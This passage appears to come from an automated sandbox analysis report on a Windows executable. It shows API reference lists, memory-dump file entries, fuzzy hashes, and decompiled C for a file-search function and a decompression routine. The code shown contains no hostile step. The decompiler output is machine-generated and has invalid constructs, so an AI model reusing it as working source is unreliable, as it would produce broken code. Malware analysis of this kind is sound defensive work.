                                                                            0x004022e8
                                                                            0x004022e8
                                                                            0x004022ef
                                                                            0x00402237
                                                                            0x00402237
                                                                            0x00402246
                                                                            0x0040224a
                                                                            0x0040224d
                                                                            0x00402253
                                                                            0x00402261
                                                                            0x00402264
                                                                            0x00402266
                                                                            0x00402271
                                                                            0x00402271
                                                                            0x00402276
                                                                            0x00402278
                                                                            0x0040227f
                                                                            0x0040227f
                                                                            0x00402282
                                                                            0x0040228b
                                                                            0x0040228e
                                                                            0x00402294
                                                                            0x00402296
                                                                            0x004022a0
                                                                            0x004022a0
                                                                            0x004022a3
                                                                            0x004022ac
                                                                            0x004022af
                                                                            0x004022b8
                                                                            0x004022be
                                                                            0x004022c0
                                                                            0x004022ce
                                                                            0x004022ce
                                                                            0x004022d1
                                                                            0x004022d7
                                                                            0x004022d7
                                                                            0x004022da
                                                                            0x004022e0
                                                                            0x004022e6
                                                                            0x004022fb
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004022e6
                                                                            0x004022f1
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID:
                                                                            • API String ID: 542301482-0
                                                                            • Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                                                                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                            • Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                                                                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040290B, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 39%
                                                                            			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                            0x00402923
                                                                            0x0040293e
                                                                            0x00402949
                                                                            0x0040294a
                                                                            0x00402a94
                                                                            0x00402925
                                                                            0x00402928
                                                                            0x0040292b
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                                                                            • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                            • Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                                                                            • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406D85, Relevance: .3, Instructions: 334COMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
